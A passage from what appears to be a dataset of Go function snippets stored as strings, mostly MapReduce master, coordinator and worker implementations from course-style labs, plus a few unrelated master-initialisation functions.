len(files)-1),\n\t\tinProgressMaps: make(map[int]bool),\n\t\tcompletedMaps: make(map[int]bool),\n\n\t\tinProgressReduces: make(map[int]bool),\n\t\tcompletedReduces: make(map[int]bool),\n\t}\n\n\t// Your code here.\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.files = files\n\tm.nReduce = nReduce\n\n\tm.todoMapTask = make(map[int]int64)\n\tfor i, _ := range m.files {\n\t\tm.todoMapTask[i] = 0\n\t}\n\n\tm.todoReduceTask = make(map[int]int64)\n\n\tfor i := 0; i < nReduce; i++ {\n\t\tm.todoReduceTask[i] = 0\n\t}\n\n\t// 清理其他任务的中间文件\n\tClearDirtyFile()\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{\n\t\tnReduce: nReduce,\n\t\tmapTask: []Task{},\n\t\tmasterState: newMaster,\n\t\tend: false,\n\t}\n\n\t// Your code here.\n\n\tfor i, file := range files {\n\t\tm.mapTask = append(m.mapTask, Task{\n\t\t\tType_: mapTask,\n\t\t\tId: i,\n\t\t\tFilename: file,\n\t\t\tState: initialState,\n\t\t\tNReduce: m.nReduce,\n\t\t})\n\t}\n\n\tgo m.server()\n\treturn &m\n}", "func MakeMaster(files []string, NumReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.NumMap = len(files)\n\tm.NumReduce = NumReduce\n\tm.MapFinish = false\n\tm.ReduceFinish = false\n\tfor index, file := range files {\n\t\tvar tempTask MapReduceTask\n\t\ttempTask.NumMap = m.NumMap\n\t\ttempTask.NumReduce = m.NumReduce\n\t\ttempTask.TaskType = \"Map\"\n\t\ttempTask.TaskStatus = \"Unassigned\"\n\t\ttempTask.TaskNum = index\n\t\ttempTask.MapFile = file\n\t\tm.MapTasks = append(m.MapTasks, tempTask)\n\t}\n\tfor i := 0; i < m.NumReduce; i++ {\n\t\tvar tempTask MapReduceTask\n\t\ttempTask.NumMap = m.NumMap\n\t\ttempTask.NumReduce = m.NumReduce\n\t\ttempTask.TaskType = \"Reduce\"\n\t\ttempTask.TaskStatus = \"Unassigned\"\n\t\ttempTask.TaskNum = i\n\t\tfor j := 0; j < m.NumMap; j++ {\n\t\t\ttempTask.ReduceFiles = append(tempTask.ReduceFiles, intermediateFilename(j, i))\n\t\t}\n\t\tm.ReduceTasks = append(m.ReduceTasks, tempTask)\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.mMap = len(files)\n\tm.nReduce = nReduce\n\tm.files = files\n\n\tm.remainReduceCount = nReduce\n\tm.remainMapCount = m.mMap\n\tm.maps = make([]mapUnit, m.mMap)\n\tm.reduces = make([]reduceUnit, nReduce)\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(filePath string, nReduce int) *Master {\n\n\tWriteDataIntoLists(filePath)\n\n\t// fmt.Println(courseList)\n\t// fmt.Println(roomList)\n\t// fmt.Println(timeSlotList)\n\n\tvar firstGeneration []Chrom\n\tfirstGeneration = CreateFirstGeneration(courseList, timeSlotList, roomList)\n\t//fmt.Println(len(firstGeneration))\n\t//PrintGeneration(firstGeneration)\n\t// for _, chrom := range firstGeneration {\n\t// \tfor _, gene := range chrom.genes {\n\t// \t\tPrintGene(gene)\n\t// \t}\n\t// }\n\n\tbestFitValue := float64(0)\n\tbestChromId := 0\n\n\tfor _, chrom := range firstGeneration {\n\t\tif chrom.FitnessScore > bestFitValue {\n\t\t\tbestChromId = chrom.Id\n\t\t\tbestFitValue = chrom.FitnessScore\n\t\t}\n\t}\n\n\tprevGeneration = firstGeneration\n\n\tbestChromInPrevGen := GetBestChromFromGen(prevGeneration)\n\twipGen = append(wipGen, bestChromInPrevGen)\n\tfmt.Println(\"------------------------------\")\n\tPrintGeneration(firstGeneration)\n\tfmt.Println(\"bestFitValue in initial generation is \", bestFitValue, \" chrom id is \", bestChromId)\n\n\tm := Master{}\n\n\tgo Monitor()\n\tm.server()\n\treturn &m\n}", "func StartMaster(config *Config, reduceFunc ReduceFunc) error {\n\t// Config variables\n\tmaster := config.Master\n\tinput := config.InputData\n\ttable := config.Table\n\toutput := config.Output\n\tm := config.M\n\tr := config.R\n\n\t// Load the input data\n\tdb, err := sql.Open(\"sqlite3\", input)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\tfailure(\"sql.Open\")\n\t\treturn err\n\t}\n\tdefer db.Close()\n\n\t// Count the work to be done\n\tquery, err := db.Query(fmt.Sprintf(\"select count(*) from %s;\", table))\n\tif err != nil {\n\t\tfailure(\"sql.Query4\")\n\t\tlog.Println(err)\n\t\treturn err\n\t}\n\tdefer query.Close()\n\n\t// Split up the data per m\n\tvar count int\n\tvar chunksize int\n\tquery.Next()\n\tquery.Scan(&count)\n\tchunksize = int(math.Ceil(float64(count)/float64(m)))\n\tvar works []Work\n\tfor i:=0; i<m; i++ {\n\t\tvar work Work\n\t\twork.Type = TYPE_MAP\n\t\twork.Filename = input\n\t\twork.Offset = i * chunksize\n\t\twork.Size = chunksize\n\t\twork.WorkerID = i\n\t\tworks = append(works, work)\n\t}\n\n\t// Set up the RPC server to listen for workers\n\tme := new(Master)\n\tme.Maps = works\n\tme.M = m\n\tme.R = r\n\tme.ReduceCount = 0\n\tme.DoneChan = make(chan int)\n\tme.Table = table\n\tme.Output = output\n\n\trpc.Register(me)\n\trpc.HandleHTTP()\n\n\tgo func() {\n\t\terr := http.ListenAndServe(master, nil)\n\t\tif err != nil {\n\t\t\tfailure(\"http.ListenAndServe\")\n\t\t\tlog.Println(err.Error())\n\t\t\tos.Exit(1)\n\t\t}\n\t}()\n\n\t<-me.DoneChan\n\n\terr = Merge(r, reduceFunc, output)\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\n\treturn nil\n}", "func New(files []string, nReduce int) *Master {\n\tmapTasks := map[string]model.Task{}\n\tfor _, f := range files {\n\t\tt := model.Task{\n\t\t\tFiles: []string{f},\n\t\t\tNReduce: nReduce,\n\t\t\tType: model.Map,\n\t\t\tStatus: pending,\n\t\t}\n\t\t// Sanitize filename.\n\t\tmapTasks[path.Base(f)] = t\n\t}\n\n\t// Create empty reduce tasks.\n\treduceTasks := map[string]model.Task{}\n\tfor i := 1; i <= nReduce; i++ {\n\t\treduceTasks[toString(i)] = model.Task{\n\t\t\tType: model.Reduce,\n\t\t\tStatus: pending,\n\t\t}\n\t}\n\n\treturn &Master{\n\t\tmapTasks: mapTasks,\n\t\treduceTasks: reduceTasks,\n\t\tdone: make(chan struct{}),\n\t\tmutex: sync.RWMutex{},\n\t\ttimeout: make(chan struct{ taskName, taskType string }),\n\t\tphase: model.Map,\n\t}\n}", "func (mr *MapReduce) RunMaster() []int {\n\tnumMapJobs := mr.nMap\n\tnumReduceJobs := mr.nReduce\n\tvar w sync.WaitGroup\n\n\tfor mapJob := 0; mapJob < numMapJobs; mapJob++ {\n\t\tavailableWorker := <-mr.registerChannel\n\t\tfmt.Println(\"USING WORKER\", availableWorker, \"for Map Job\")\n\t\tw.Add(1)\n\t\tgo func(worker string, i int) {\n\t\t\tdefer w.Done()\n\t\t\tvar reply DoJobReply\n\t\t\targs := &DoJobArgs{mr.file, Map, i, mr.nReduce}\n\t\t\tok := call(worker, \"Worker.DoJob\", args, &reply)\n\t\t\tif !ok {\n\t\t\t\tfmt.Println(\"Map Job\", i, \"has FAILED\")\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"Map Job\", i, \"is SUCCESS\")\n\t\t\t}\n\t\t\tmr.registerChannel <- worker\n\t\t}(availableWorker, mapJob)\n\t}\n\n\tw.Wait()\n\tfmt.Println(\"DONE WITH ALL MAP JOBS\")\n\n\tfor reduceJob := 0; reduceJob < numReduceJobs; reduceJob++ {\n\t\tavailableWorker := <-mr.registerChannel\n\t\tfmt.Println(\"USING WORKER\", availableWorker, \"for Reduce Job\")\n\t\tw.Add(1)\n\t\tgo func(worker string, i int) {\n\t\t\tdefer w.Done()\n\t\t\tvar reply DoJobReply\n\t\t\targs := &DoJobArgs{mr.file, Reduce, i, mr.nMap}\n\t\t\tok := call(worker, \"Worker.DoJob\", args, &reply)\n\t\t\tif !ok {\n\t\t\t\tfmt.Println(\"Reduce Job\", i, \"has FAILED\")\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"Reduce Job\", i, \"is SUCCESS\")\n\t\t\t}\n\t\t\tmr.registerChannel <- worker\n\t\t}(availableWorker, reduceJob)\n\t}\n\n\tw.Wait()\n\tfmt.Println(\"DONE WITH ALL REDUCE JOBS\")\n\n\treturn mr.KillWorkers()\n}", "func (m *ParallelMaster) Start() {\n\tatomic.StoreInt32(&m.active, 1)\n\tm.rpcListener = startMasterRPCServer(m)\n\t// Don't remove the code above here.\n\n\tcount := uint(len(m.InputFileNames))\n\tmapbuffer := make(chan TaskArgs, count)\n\treducebuffer := make(chan TaskArgs, m.NumReducers)\n\n\tfor i, task := range m.InputFileNames {\n\t\tmapbuffer <- TaskArgs(&DoMapArgs{ task, uint(i), m.NumReducers })\n\t}\n\n\tfor i := uint(0); i < m.NumReducers; i += 1 {\n\t\treducebuffer <- TaskArgs(&DoReduceArgs{ i, count })\n\t}\n\n\tm.schedule(mapbuffer)\n\tm.schedule(reducebuffer)\n\n\t// Don't remove the code below here.\n\tm.Shutdown()\n\t<-m.done\n}", "func StartMaster(configFile *goconf.ConfigFile) {\n\tSubIOBufferSize(\"master\", configFile)\n\tGoMaxProc(\"master\", configFile)\n\tConBufferSize(\"master\", configFile)\n\tIOMOnitors(configFile)\n\n\thostname := GetRequiredString(configFile, \"default\", \"hostname\")\n\tpassword := GetRequiredString(configFile, \"default\", \"password\")\n\n\tm := NewMaster()\n\n\trest.Resource(\"jobs\", MasterJobController{m, password})\n\trest.Resource(\"nodes\", MasterNodeController{m, password})\n\n\trest.ResourceContentType(\"jobs\", \"application/json\")\n\trest.ResourceContentType(\"nodes\", \"application/json\")\n\n\tListenAndServeTLSorNot(hostname)\n}", "func (m *SequentialMaster) Start() {\n\tm.active = true\n\n\tw := *NewWorker(m.JobName, m.MapF, m.ReduceF)\n\n\tfor i, file := range m.InputFileNames {\n\t\tw.DoMap(file, uint(i), m.NumReducers);\n\t}\n\n\tfor i := uint(0); i < m.NumReducers; i++ {\n\t\tw.DoReduce(i, uint(len(m.InputFileNames)))\n\t}\n}", "func NewParallelMaster(jobName string, inputFileNames []string,\n\tnumReducers uint, mapF MapFunction, reduceF ReduceFunction) *ParallelMaster {\n\treturn &ParallelMaster{\n\t\tJobName: jobName,\n\t\tInputFileNames: inputFileNames,\n\t\tNumReducers: numReducers,\n\t\tMapF: mapF,\n\t\tReduceF: reduceF,\n\t\tactive: 0,\n\t\tfreeWorkers: make(chan string),\n\t\tdone: make(chan bool),\n\t}\n}", "func MakeCoordinator(files []string, nReduce int) *Coordinator {\n\tc := Coordinator{}\n\n\t// Fill map tasks\n\tc.mapTasks = make([]mapTask, len(files))\n\tc.availableMapTasks = make(map[int]int)\n\tc.mapDoneTasks = 0\n\n\tfor i, _ := range c.mapTasks {\n\t\tc.mapTasks[i] = mapTask{false, -1, files[i]}\n\t\tc.availableMapTasks[i] = i\n\t}\n\n\t// Fill reduce tasks\n\tc.reduceTasks = make([]reduceTask, nReduce)\n\tc.availableReduceTasks = make(map[int]int)\n\tc.reduceDoneTasks = 0\n\n\tfor i, _ := range c.reduceTasks {\n\t\tc.reduceTasks[i] = reduceTask{false, -1}\n\t\tc.availableReduceTasks[i] = i\n\t}\n\n\tc.server()\n\treturn &c\n}", "func MakeCoordinator(files []string, nReduce int) *Coordinator {\n\tc := Coordinator{}\n\tc.mu = sync.Mutex{}\n\tc.nReduce = nReduce\n\tc.files = files\n\tif nReduce > len(files){\n\t\tc.taskCh = make(chan Task,nReduce)\n\t}else{\n\t\tc.taskCh = make(chan Task,len(c.files))\n\t}\n\tc.initMapTask()\n\tgo c.tickSchedule()\n\tc.server()\n\tDPrintf(\"coordinator init\")\n\treturn &c\n}", "func CreateMaster() (err error) {\n\tconn := getConnection(\"mflow\")\n\n\tdb, err := sql.Open(\"godror\", conn.User+\"/\"+conn.Password+\"@\"+conn.ConnectionString)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tdefer db.Close()\n\ttx, err := db.Begin()\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\ttx.QueryRow(`select mflow.seq_tasks_master.nextval from dual`).Scan(&global.IDMaster)\n\n\tcommand := fmt.Sprintf(`\n\t\tinsert into mflow.tasks_master(id,start_date,end_date,status)\n\t\tvalues(%v,sysdate,null,'%v')\n\t`, global.IDMaster, startedStatus)\n\t_, err = tx.Exec(command)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\terr = tx.Commit()\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tfor x := range config.Config.Tasks.Tasks {\n\t\tcreateTask(config.Config.Tasks.Tasks[x].ID)\n\t}\n\treturn\n}", "func (m *Master) Generate(dependencies asset.Parents) error {\n\tinstallconfig := &installconfig.InstallConfig{}\n\tmign := &machine.Master{}\n\tdependencies.Get(installconfig, mign)\n\n\tvar err error\n\tuserDataMap := map[string][]byte{\"master-user-data\": mign.File.Data}\n\tm.UserDataSecretRaw, err = userDataList(userDataMap)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to create user-data secret for worker machines\")\n\t}\n\n\tic := installconfig.Config\n\tpool := masterPool(ic.Machines)\n\tnumOfMasters := int64(0)\n\tif pool.Replicas != nil {\n\t\tnumOfMasters = *pool.Replicas\n\t}\n\n\tswitch ic.Platform.Name() {\n\tcase \"aws\":\n\t\tconfig := aws.MasterConfig{}\n\t\tconfig.ClusterName = ic.ObjectMeta.Name\n\t\tconfig.Region = ic.Platform.AWS.Region\n\t\tconfig.Machine = defaultAWSMachinePoolPlatform()\n\n\t\ttags := map[string]string{\n\t\t\t\"tectonicClusterID\": ic.ClusterID,\n\t\t}\n\t\tfor k, v := range ic.Platform.AWS.UserTags {\n\t\t\ttags[k] = v\n\t\t}\n\t\tconfig.Tags = tags\n\n\t\tconfig.Machine.Set(ic.Platform.AWS.DefaultMachinePlatform)\n\t\tconfig.Machine.Set(pool.Platform.AWS)\n\n\t\tctx, cancel := context.WithTimeout(context.TODO(), 60*time.Second)\n\t\tdefer cancel()\n\t\tami, err := rhcos.AMI(ctx, rhcos.DefaultChannel, config.Region)\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"failed to determine default AMI\")\n\t\t}\n\t\tconfig.AMIID = ami\n\t\tazs, err := aws.AvailabilityZones(config.Region)\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"failed to fetch availability zones\")\n\t\t}\n\n\t\tfor i := 0; i < int(numOfMasters); i++ {\n\t\t\tazIndex := i % len(azs)\n\t\t\tconfig.Instances = append(config.Instances, aws.MasterInstance{AvailabilityZone: azs[azIndex]})\n\t\t}\n\n\t\tm.MachinesRaw = applyTemplateData(aws.MasterMachineTmpl, config)\n\tcase \"libvirt\":\n\t\tinstances := []string{}\n\t\tfor i := 0; i < int(numOfMasters); i++ {\n\t\t\tinstances = append(instances, fmt.Sprintf(\"master-%d\", i))\n\t\t}\n\t\tconfig := libvirt.MasterConfig{\n\t\t\tClusterName: ic.ObjectMeta.Name,\n\t\t\tInstances: instances,\n\t\t\tPlatform: *ic.Platform.Libvirt,\n\t\t}\n\t\tm.MachinesRaw = applyTemplateData(libvirt.MasterMachinesTmpl, config)\n\tcase \"openstack\":\n\t\tinstances := []string{}\n\t\tfor i := 0; i < int(numOfMasters); i++ {\n\t\t\tinstances = append(instances, fmt.Sprintf(\"master-%d\", i))\n\t\t}\n\t\tconfig := openstack.MasterConfig{\n\t\t\tClusterName: ic.ObjectMeta.Name,\n\t\t\tInstances: instances,\n\t\t\tImage: ic.Platform.OpenStack.BaseImage,\n\t\t\tRegion: ic.Platform.OpenStack.Region,\n\t\t\tMachine: defaultOpenStackMachinePoolPlatform(),\n\t\t}\n\n\t\ttags := map[string]string{\n\t\t\t\"tectonicClusterID\": ic.ClusterID,\n\t\t}\n\t\tconfig.Tags = tags\n\n\t\tconfig.Machine.Set(ic.Platform.OpenStack.DefaultMachinePlatform)\n\t\tconfig.Machine.Set(pool.Platform.OpenStack)\n\n\t\tm.MachinesRaw = applyTemplateData(openstack.MasterMachinesTmpl, config)\n\tdefault:\n\t\treturn fmt.Errorf(\"invalid Platform\")\n\t}\n\treturn nil\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\tfmt.Println(\"make worker\")\n\n\targs := MRArgs{}\n\targs.Phase = registerPhase\n\n\treply := MRReply{}\n\tcall(\"Master.Schedule\", &args, &reply)\n\t//向master注册\n\n\t//fmt.Printf(\"get map task %v\\n\", reply.NTask)\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n\t//fmt.Printf(\"get map task %v\\n\", reply.NTask)\n\n\tfor reply.TaskNum != -2 {\n\n\t\t//reply的TaskNum为-1代表此时仍然有任务未完成,但是这些任务还在生存周期内\n\t\t//reply的TaskNum为-2代表此时仍然所有任务都已完成\n\t\t//fmt.Println(\"get map task\")\n\t\tfmt.Printf(\"get map task %v %v\\n\", reply.TaskNum, reply.FileName)\n\n\t\tif reply.TaskNum == -1 {\n\t\t\t//休眠3s再向master询问\n\t\t\ttime.Sleep(time.Duration(3) * time.Second)\n\t\t\tfmt.Printf(\"worker wake up\\n\")\n\t\t\targs = MRArgs{}\n\t\t\targs.Phase = mapPhase\n\t\t\targs.TaskNum = -1\n\n\t\t\treply = MRReply{}\n\t\t\tcall(\"Master.Schedule\", &args, &reply)\n\t\t\tcontinue\n\t\t}\n\n\t\t//这里与mrsequential.go相似,完成map任务,并输出到中间文件中\n\t\tintermediate := []KeyValue{}\n\t\tfilename := reply.FileName\n\t\tfile, err := os.Open(filename)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"cannot open %v\", filename)\n\t\t}\n\t\tcontent, err := ioutil.ReadAll(file)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"cannot read %v\", filename)\n\t\t}\n\t\tfile.Close()\n\t\tkva := mapf(filename, string(content))\n\t\tintermediate = append(intermediate, kva...)\n\t\tsort.Sort(ByKey(intermediate))\n\n\t\tfilesenc := make([]*json.Encoder, reply.NTask)\n\t\tfiles := make([]*os.File, reply.NTask)\n\n\t\tfor i := 0; i < reply.NTask; i++ {\n\t\t\tfileName := \"mr-\" + strconv.Itoa(reply.TaskNum) + \"-\" + strconv.Itoa(i)\n\t\t\tfout, err := os.Create(fileName)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(fileName, err)\n\t\t\t\treturn\n\t\t\t}\n\t\t\tfilesenc[i] = json.NewEncoder(fout)\n\t\t\tfiles[i] = fout\n\t\t}\n\n\t\ti := 0\n\t\tfor i < len(intermediate) {\n\t\t\tj := i\n\t\t\toutput := KeyValue{intermediate[i].Key, intermediate[i].Value}\n\n\t\t\tfor ; j < len(intermediate) && intermediate[j].Key == intermediate[i].Key; j++ {\n\n\t\t\t\terr := filesenc[ihash(intermediate[i].Key)%reply.NTask].Encode(&output)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfmt.Printf(\"%s Encode Failed %v\\n\", intermediate[i].Key, err)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// this is the correct format for each line of Reduce output.\n\n\t\t\ti = j\n\t\t}\n\n\t\tfor _, f := range files {\n\t\t\tf.Close()\n\t\t}\n\n\t\targs = MRArgs{}\n\t\targs.Phase = mapPhase\n\t\targs.TaskNum = reply.TaskNum\n\n\t\treply = MRReply{}\n\t\tcall(\"Master.Schedule\", &args, &reply)\n\t}\n\n\targs = MRArgs{}\n\targs.Phase = waitReducePhase\n\n\treply = MRReply{}\n\n\tcall(\"Master.Schedule\", &args, &reply)\n\n\tfor reply.TaskNum != -2 {\n\n\t\t//reply的TaskNum为-1代表此时仍然有任务未完成,但是这些任务还在生存周期内\n\t\t//reply的TaskNum为-2代表此时仍然所有任务都已完成\n\n\t\tif reply.TaskNum == -1 {\n\t\t\ttime.Sleep(time.Duration(1) * time.Second)\n\t\t\targs = MRArgs{}\n\t\t\targs.Phase = reducePhase\n\t\t\targs.TaskNum = -1\n\n\t\t\treply = MRReply{}\n\t\t\tcall(\"Master.Schedule\", &args, &reply)\n\t\t\tcontinue\n\t\t}\n\n\t\tfmt.Printf(\"get reduce task %v\\n\", reply.TaskNum)\n\n\t\tkva := []KeyValue{}\n\t\tfor j := 0; j < reply.NTask; j++ {\n\t\t\tfilename := \"mr-\" + strconv.Itoa(j) + \"-\" + strconv.Itoa(reply.TaskNum)\n\t\t\tfile, err := os.Open(filename)\n\t\t\tif err != nil {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tdec := json.NewDecoder(file)\n\t\t\tfor {\n\t\t\t\tvar kv KeyValue\n\t\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tkva = append(kva, kv)\n\t\t\t}\n\t\t\tfile.Close()\n\t\t}\n\n\t\tsort.Sort(ByKey(kva))\n\n\t\toname := \"mr-out-\" + strconv.Itoa(reply.TaskNum)\n\t\tofile, _ := os.Create(oname)\n\n\t\ti := 0\n\n\t\tfmt.Printf(\"reduce taks %v length %v\\n\", reply.TaskNum, len(kva))\n\t\tfor i < len(kva) {\n\t\t\tj := i + 1\n\t\t\tfor j < len(kva) && kva[j].Key == kva[i].Key {\n\t\t\t\tj++\n\t\t\t}\n\t\t\tvalues := []string{}\n\t\t\tfor k := i; k < j; k++ {\n\t\t\t\tvalues = append(values, kva[k].Value)\n\t\t\t}\n\t\t\toutput := reducef(kva[i].Key, values)\n\n\t\t\t// this is the correct format for each line of Reduce output.\n\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", kva[i].Key, output)\n\n\t\t\ti = j\n\t\t}\n\n\t\targs = MRArgs{}\n\t\targs.Phase = reducePhase\n\t\targs.TaskNum = reply.TaskNum\n\n\t\treply = MRReply{}\n\t\tcall(\"Master.Schedule\", &args, &reply)\n\t}\n\n}", "func NewSequentialMaster(jobName string, inputFileNames []string,\n\tnumReducers uint, mapF MapFunction, reduceF ReduceFunction) *SequentialMaster {\n\treturn &SequentialMaster{\n\t\tJobName: jobName,\n\t\tInputFileNames: inputFileNames,\n\t\tNumReducers: numReducers,\n\t\tMapF: mapF,\n\t\tReduceF: reduceF,\n\t\tactive: false,\n\t}\n}", "func MakeCoordinator(files []string, nReduce int) *Coordinator {\n\tc := Coordinator{\n\t\tFileNames: files,\n\t\tMapNums: len(files),\n\t\tReduceNums: nReduce,\n\t\tMapFlags: make([]Flag, len(files)),\n\t\tReduceFlags: make([]Flag, nReduce),\n\t\tMapTaskCnts: make([]int, len(files)),\n\t\tReduceTaskCnts: make([]int, nReduce),\n\t\tMapAllDone: false,\n\t\tReduceAllDone: false,\n\t}\n\t// Your code here.\n\tgo c.HandleTimeout()\n\tc.httpServer()\n\treturn &c\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n\t// 1. notify master of worker creation\n\tworkerID, nReduce := WorkerCreation()\n\n\tfor true{\n\t\ttask, files, taskID := RequestWork()\n\n\t\tif task == \"done\"{\n\t\t\tfmt.Printf(\"Worker %v received done signal\", workerID)\n\n\t\t\t// Notify master of shut down completion\n\t\t\tWorkerShutDown(workerID)\n\t\t\treturn\n\t\t}\n\n\t\tif task == \"map\"{\n\t\t\tfmt.Printf(\"Worker %v received map task\\n\", workerID)\n\n\t\t\tfileName := files[0]\n\t\t\t// read file contents\n\t\t\tfile, _:= os.Open(fileName)\n\t\t\tcontents, _ := ioutil.ReadAll(file)\n\t\t\tfile.Close()\n\n\t\t\tkva := mapf(fileName, string(contents))\n\n\t\t\t// Generate 10 intermediate files\n\t\t\toffset := len(kva) / nReduce\n\t\t\tstart := 0\n\t\t\tend := start + offset\n\n\t\t\tintermediateFiles := make([]string, 0)\n\n\t\t\tfor i:=0; i<nReduce; i++{\n\t\t\t\tend = min(end, len(kva))\n\n\t\t\t\tsegment := kva[start:end]\n\t\t\t\tstart += offset\n\t\t\t\tend += offset\n\n\t\t\t\t// Write to intermediate file\n\t\t\t\tfileName := \"mrIntermediate-\" + strconv.Itoa(taskID) + \"-\" + strconv.Itoa(i)\n\t\t\t\tintermediateFiles = append(intermediateFiles, fileName)\n\n\t\t\t\tofile, _ := os.Create(fileName)\n\t\t\t\tfor j:=0; j<len(segment); j++{\n\t\t\t\t\tpair := segment[j]\n\n\t\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", pair.Key, pair.Value)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tMapDone(intermediateFiles)\n\n\t\t} else if task == \"reduce\"{\n\t\t\t// Create <word, list(pair(word, 1))> hash map\n\t\t\tkv_map := make(map[string]([]string))\n\n\t\t\tfmt.Printf(\"Worker %v reduce task received\\n\", workerID)\n\n\t\t\t// Hash all rows in each intermediate file\n\t\t\tfor i:=0; i<len(files); i++{\n\t\t\t\tfile := files[i]\n\n\t\t\t\t// read file contents\n\t\t\t\tf, _ := os.Open(file)\n\n\t\t\t\tscanner := bufio.NewScanner(f)\n\t\t\t\tfor scanner.Scan() {\n\t\t\t\t\tline := scanner.Text()\n\n\t\t\t\t\twords := strings.Fields(line)\n\t\t\t\t\tkey := words[0]\n\n\t\t\t\t\tkv_map[key] = append(kv_map[key], line)\n\t\t\t\t}\n\n\t\t\t\tf.Close()\n\t\t\t}\n\n\t\t\t// Sort keys in ascending order\n\t\t\tsortedKeys := make([]string, 0)\n\n\t\t\tfor k, _ := range kv_map{\n\t\t\t\tsortedKeys = append(sortedKeys, k)\n\t\t\t}\n\n\t\t\t// Create output file\n\t\t\tfileName := \"mr-out-\" + strconv.Itoa(taskID)\n\t\t\tofile, _ := os.Create(fileName)\n\n\t\t\t// Perform reduce on each sorted key\n\t\t\tfor i:=0; i<len(sortedKeys); i++{\n\t\t\t\tcount := reducef(sortedKeys[i], kv_map[sortedKeys[i]])\n\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", sortedKeys[i], count)\n\t\t\t}\n\t\t}\n\t}\n\n}", "func main() {\n\n //bring up the services\n\tmasterSrvAddr := master.StartMasterSrv(9090) //9090\n\tworkerSrvAddr1 := worker.StartWorkerSrv(9091); //9091 ,9092, 9093\n\tworkerSrvAddr2 := worker.StartWorkerSrv(9092);\n\tworker.StartWorkerCli(masterSrvAddr, []string{workerSrvAddr1,workerSrvAddr2});\n\tmaster.StartMasterCli();\n\n\t//distributed map-reduce flow\n\tmapOutput,err := master.DoOperation([]string{\"/Users/k0c00nc/go/src/MapReduce/res/input.txt\", \"/Users/k0c00nc/go/src/distributedDb\" +\n\t\t\"/res/input1.txt\"},\"Map\")\n\tif err !=nil{\n\t\tfmt.Printf(\"map phase failed with err %s \", err.Error())\n\t}\n\n\tlocalAggregation,err :=master.DoOperation(mapOutput,\"LocalAggregation\")\n\tif err !=nil{\n\t\tfmt.Printf(\"localAggregation phase failed with err %s \", err.Error())\n\t}\n\n\tshuffing,err :=master.DoOperation(localAggregation,\"Shuffing\")\n\tif err !=nil{\n\t\tfmt.Printf(\"shuffing phase failed with err %s \", err.Error())\n\t}\n\n\treduce,err :=master.DoOperation(shuffing,\"Reduce\")\n\tif err !=nil{\n\t\tfmt.Printf(\"reduce phase failed with err %s \", err.Error())\n\t}\n\n fmt.Println(\"MR output are in file\", reduce[0])\n\n}", "func NewMaster() *Master {\n\tm := &Master{\n\t\tsubMap: map[string]*Submission{},\n\t\tjobChan: make(chan *WorkerJob, 0),\n\t\tNodeHandles: map[string]*NodeHandle{}}\n\thttp.Handle(\"/master/\", websocket.Handler(func(ws *websocket.Conn) { m.Listen(ws) }))\n\treturn m\n}", "func MakeCoordinator(files []string, nReduce int) *Coordinator {\n\tmapTaskNum := len(files)\n\treduceTaskNum := nReduce\n\ttaskNum := mapTaskNum + reduceTaskNum\n\n\tvar mapTaskList []*Task\n\tfor iMap, file := range files {\n\t\tmapTaskList = append(mapTaskList, &Task{\n\t\t\tID: 0, // set later\n\t\t\tType: TaskMap,\n\t\t\tMapTask: &MapTask{\n\t\t\t\tFile: file,\n\t\t\t\tIMap: iMap,\n\t\t\t\tNReduce: reduceTaskNum,\n\t\t\t},\n\t\t\tReduceTask: nil,\n\t\t})\n\t}\n\n\tvar reduceTaskList []*Task\n\tfor iReduce := 0; iReduce < reduceTaskNum; iReduce++ {\n\t\treduceTaskList = append(reduceTaskList, &Task{\n\t\t\tID: 0, // set later\n\t\t\tType: TaskReduce,\n\t\t\tMapTask: nil,\n\t\t\tReduceTask: &ReduceTask{\n\t\t\t\tNMap: mapTaskNum,\n\t\t\t\tIReduce: iReduce,\n\t\t\t},\n\t\t})\n\t}\n\n\ttaskList := mapTaskList\n\ttaskList = append(taskList, reduceTaskList...)\n\tfor i, task := range taskList {\n\t\ttask.ID = i\n\t}\n\n\tc := Coordinator{\n\t\ttaskNum: taskNum,\n\t\tmapTaskNum: mapTaskNum,\n\t\treduceTaskNum: reduceTaskNum,\n\t\ttaskList: taskList,\n\t\ttaskBeginTime: make([]int64, taskNum),\n\t}\n\tc.isDone.Store(false)\n\tc.server()\n\treturn &c\n}", "func MakeCoordinator(files []string, nReduce int) *Coordinator {\n\tc := Coordinator{\n\t\tfiles: files,\n\t\tnReduce: nReduce,\n\t\tjobLock: &sync.Mutex{},\n\t}\n\tc.initMapJob()\n\tc.server()\n\treturn 